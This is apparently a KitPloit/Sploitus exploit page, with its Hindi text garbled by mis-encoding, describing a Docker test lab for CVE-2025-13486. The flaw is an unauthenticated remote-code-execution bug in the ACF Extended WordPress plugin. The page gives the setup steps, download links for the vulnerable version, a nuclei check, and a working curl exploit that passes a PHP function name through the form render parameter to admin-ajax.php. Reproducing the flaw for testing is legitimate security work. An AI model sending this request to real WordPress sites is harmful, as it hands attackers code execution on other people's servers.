## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KRE80R-CVE-2025-13486-VULN-SETUP
# CVE-2025-13486 рдХрдордЬреЛрд░ рдкрд░реАрдХреНрд╖рдг рд╡рд╛рддрд╛рд╡рд░рдг
ACF Extended RCE рдХрдордЬреЛрд░реА рдХреЗ рдкрд░реАрдХреНрд╖рдг рдХреЗ рд▓рд┐рдП рдПрдХ-рдмрд╛рд░ Docker рд╕реЗрдЯрдЕрдкред
## рддреНрд╡рд░рд┐рдд рдЖрд░рдВрдн
root@kitploit:~
# 1. рдкреНрд▓рдЧрдЗрдиреНрд╕ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ (рдПрдХ рдмрд╛рд░ рдЪрд▓рд╛рдПрдВ)
./download-plugins.sh
# 2. рд╡рд╛рддрд╛рд╡рд░рдг рд╢реБрд░реВ рдХрд░реЗрдВ
docker-compose up -d --build
# 3. рд╕реЗрдЯрдЕрдк рдХреЗ рд▓рд┐рдП ~30 рд╕реЗрдХрдВрдб рдкреНрд░рддреАрдХреНрд╖рд╛ рдХрд░реЗрдВ, рдлрд┐рд░ рдкрд░реАрдХреНрд╖рдг рдХрд░реЗрдВ
nuclei -t CVE-2025-13486.yaml -u http://localhost:8888
## рдореИрдиреНрдпреБрдЕрд▓ рдкреНрд▓рдЧрдЗрди рд╕реЗрдЯрдЕрдк
рдпрджрд┐ рдбрд╛рдЙрдирд▓реЛрдб рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╡рд┐рдлрд▓ рд╣реЛ рдЬрд╛рддреА рд╣реИ, рддреЛ рдЗрди рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ `plugins/` рдореЗрдВ рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ рд░рдЦреЗрдВ:
1. **ACF Pro** (рдЖрд╡рд╢реНрдпрдХ рдирд┐рд░реНрднрд░рддрд╛)
* рдпрд╣рд╛рдБ рд╕реЗ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ: https://www.advancedcustomfields.com/pro/
* рдЗрд╕ рд░реВрдк рдореЗрдВ рд╕рд╣реЗрдЬреЗрдВ: `plugins/acf-pro.zip`
2. **ACF Extended 0.9.0.5** (рдХрдордЬреЛрд░ рд╕рдВрд╕реНрдХрд░рдг)
* рдпрд╣рд╛рдБ рд╕реЗ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ: https://downloads.wordpress.org/plugin/acf-extended.0.9.0.5.zip
* рдЗрд╕ рд░реВрдк рдореЗрдВ рд╕рд╣реЗрдЬреЗрдВ: `plugins/acf-extended.zip`
## рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдХрд╛ рдкрд░реАрдХреНрд╖рдг
root@kitploit:~
# рд╣реЛрдордкреЗрдЬ рд╕реЗ nonce рдирд┐рдХрд╛рд▓реЗрдВ
curl -s http://localhost:8888/ | grep -oP '"nonce":"([a-f0-9]+)"'
# print_r рдХреЗ рд╕рд╛рде RCE рдкрд░реАрдХреНрд╖рдг рдХрд░реЗрдВ
curl -X POST http://localhost:8888/wp-admin/admin-ajax.php \
-d "action=acfe/form/render_form_ajax&nonce=<NONCE>&form[render]=print_r&form[test]=PWNED"
## рд╕рдлрд╛рдИ
root@kitploit:~
docker-compose down -v
## рдХрдордЬреЛрд░реА рд╡рд┐рд╡рд░рдг
* **CVE** : CVE-2025-13486
* **рдкреНрд░рднрд╛рд╡рд┐рдд** : ACF Extended 0.9.0.5 - 0.9.1.1
* **рдкреНрд░рдХрд╛рд░** : `call_user_func_array()` рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдмрд┐рдирд╛ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЗ RCE
* **CVSS** : 9.8 (рдЧрдВрднреАрд░)